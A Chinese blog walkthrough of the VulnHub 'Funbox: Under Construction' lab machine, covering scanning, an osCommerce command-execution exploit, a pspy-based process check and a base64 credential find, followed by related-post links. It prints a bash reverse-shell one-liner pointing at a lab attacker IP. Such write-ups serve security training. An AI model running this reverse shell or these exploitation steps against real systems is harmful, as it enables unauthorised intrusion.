vulnhub Funbox: Under Construction

最新推荐文章于 2022-09-17 14:16:26 发布
最新推荐文章于 2022-09-17 14:16:26 发布
阅读量639 收藏 1
点赞数
分类专栏: 靶机 文章标签: 安全 渗透 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48985780/article/details/126833158
版权

环境搭建:

Funbox: Under Construction! ~ VulnHub

漏洞复现:

探测靶机的IP地址

nmap进行探测靶机的服务和端口

 访问80端口

 

 dirb扫描目录,发现catalog目录

 

访问一下,发现是个oscommerce的网站

 

查看版本的漏洞,发现命令执行漏洞 

 

查看该文件,如果执行成功,会返回当前目录的文件

 

修改为靶机的IP

 

运行脚本

 

访问文件,得到回显

 

修改命令

bash -c "exec bash -i &>/dev/tcp/192.168.226.128/1111 <&1" 

 

查看全局变量,查看执行文件都没发现可以利用 

下载pspy64s

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s

 

 kali开启python服务,靶机进行下载

修改权限,进行执行

 

发现会执行一个脚本文件

 发现一个base64语句

 

进行解密,发现账号密码

 切换用户登录,要升级shell模式,不然不可以切换用户

 

查看目录下的flag

 

xzhome
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶机渗透练习30-Funbox9-GaoKao
hirak0的博客
04-18 863
靶机描述 靶机地址:https://www.vulnhub.com/entry/funbox-gaokao,707/ Description It’s a box for beginners, but not easy. Gather careful !!! Hint: Don’t waste your time ! Every BruteForce-Attack at all ports can be stopped after 1500 trys per account. Enjoy the game
vulnhub刷题记录(FUNBOX: UNDER CONSTRUCTION!)
ailx10
09-01 232
英文名称:FUNBOX: UNDER CONSTRUCTION!中文名称:Funbox:正在建设中!发布日期:2021 年 6 月 20 日难度:容易描述:这是面向初学者的基础级 BootToRoot 机器。有两个标志。下载地址:https://www.vulnhub.com/entry/funbox-under-construction,715/ 1、主机发现主机发现2、端口扫描端口扫描3、访问...
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox9(GaoKao)
Aluxian_的博客
09-17 1046
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。老样子需要找到flag即可。FunBox系列第九个靶机了 这个靶机比较简单1.信息收集 获取ip地址 和端口信息2.hydra暴力破解 (工具的基本使用)3.bash的反弹shell(主要是记住回弹命令)3.bash suid提权(第一次使用挺简单的)这是这个系列第八个靶机啦比较简单 希望对刚入门得小白有帮助!
VulnHub渗透测试实战靶场 - FUNBOX: CTF
LYJ20010728的博客
08-27 480
VulnHub渗透测试实战靶场 - FUNBOX: CTF题目描述环境下载FUNBOX: CTF靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 题目描述 Groundhog Day: Boot2Root ! Initial footstep is a bit flowed, but really not difficult. After getting access to Funbox: CTF, its nessesarry to find, read and understand the (2
funbox:测试和工具程序
02-11
"funbox"是一个用于测试和工具程序的项目,主要基于C语言开发。在软件开发过程中,测试和工具程序起着至关重要的作用,它们能够帮助开发者有效地检查代码质量、定位问题以及提升开发效率。下面我们将详细探讨这个...
docker-funbox:具有有趣的终端命令和ASCII艺术的Docker容器
05-04
Docker Funbox 带有有趣怪异终端命令和ASCII艺术的容器。 特色 按字母顺序: 洛尔卡特 喵喵猫 管道 RIG-随机身份生成器 sl (不要与ls混淆) 洗手间 VLC S 基本用法 $ docker run --rm -it wernight/funbox _ ...
funbox_reactapp:测试
05-11
该项目是通过引导的。 您将在下面找到一些有关如何执行常见任务的信息。 您可以在找到本指南的最新版本。目录自动格式化代码更改页面<title>... 使用AJAX请求获取数据与API后端集成节点Ruby on Rails 在开发中...
funxbox-test:Funbox的测试任务
05-08
Funbox的测试任务 要启动它: npm安装 凉亭安装 吞咽 喝一口 gulp测试(用于测试) 通过在文本框中输入名称并按Enter,可以添加新的航点。 此后: 输入的路径点显示在已添加点列表的末尾; 标记会出现在地图...
中兴funbox固件b18版本
最新发布
07-12
【中兴funbox固件b18版本】是一款专为中兴Funbox设备设计的系统升级包,基于Android 4.4操作系统。该固件旨在优化设备性能、增强稳定性、修复已知问题以及可能添加的新功能。对于用户来说,升级到这个版本可以提升...
FunBox.zip_melody
09-24
FunBox.zip_melody】是一个与音乐相关的ASM(汇编语言)代码压缩包,用于实现门铃的旋律播放功能。ASM代码是低级编程语言,直接对应于计算机硬件指令,因此这种项目通常需要深入理解处理器架构和音乐理论。在这个...
funbox界面需求文档-20160414.docm
05-08
funbox界面需求文档-20160414.docm
Fritbot:Fritbot
05-10
一旦启动了mongo服务器,请运行npm install fritbot fb-core-modules fb-pkg-funbox && node -e "new (require('fritbot').bot)()"在本地检查Fritbot! 此方法同时包含核心模块和 ,因此可以。 尝试使用“ say hi”...
i-FunBox 中文版 v1.96.938.649
04-27
软件介绍 iFunBox是一款小巧的iPhone, iPad 和 iPod Touch文件管理软件。无须越狱和任何破解,可以直接使用,不安装任何守护进程。 界面类似于windows资源管理器,以简练时尚的窗口方式浏览和管理iPhone、iPad、iPod...
vulnhub--Funbox: Under Construction!
venu_s的博客
08-04 423
靶机介绍 Description: As always, it’s a very easy box for beginners. Download:https://www.vulnhub.com/entry/funbox-under-construction,715/ 信息探测 主机发现 netdiscover -i eth0 -r 192.168.187.0/24 端口扫描 nmap -sV -p- -A 192.168.187.177 目录扫描 gobuster dir -u http://19
靶机渗透练习31-Funbox10-Under Construction
hirak0的博客
04-18 1006
靶机描述 靶机地址:https://www.vulnhub.com/entry/funbox-under-construction,715/ Description As always, it’s a very easy box for beginners. This works better on VitualBox rather than VMware 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机: IP地址:192.168.9.49 注:靶机与Kali的IP地
vulnhub Funbox: GaoKao(funbox9)
箭雨镜屋
04-08 908
渗透思路:nmap扫描----ftp匿名访问获取可能的用户名----hydra爆破ftp密码----ftp上传反弹shell,等定时任务执行获得shell----bash suid提权
Vulnhub日记(一):FunboxGaoKao
Dawn_Xi的博客
08-03 474
靶机介绍 FunBox.GaoKao 是作者为初学者设计的机器。这台机器需要一点暴力破解和一些FTP协议的知识。“Funbox Gaokao Walkthrough – Vulnhub – Writeup” 主要参考Krishna Upadhyay的WriteUp所写 虚拟机链接:https://www.vulnhub.com/entry/funbox-gaokao,707/ 开始练习 使用Nmap找到靶机ip:192.168.56.101 本机ip:192.168.56.102 nm.
VulnHub渗透测试实战靶场 - Funbox: GaoKao
LYJ20010728的博客
08-28 1005
VulnHub渗透测试实战靶场 - Funbox: GaoKao题目描述环境下载Funbox: Lunchbreaker靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 题目描述 It's a box for beginners, but not easy. Gather careful !!! Hint: Don't waste your time ! Every BruteForce-Attack at all ports can be stopped after 1500 trys per a

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值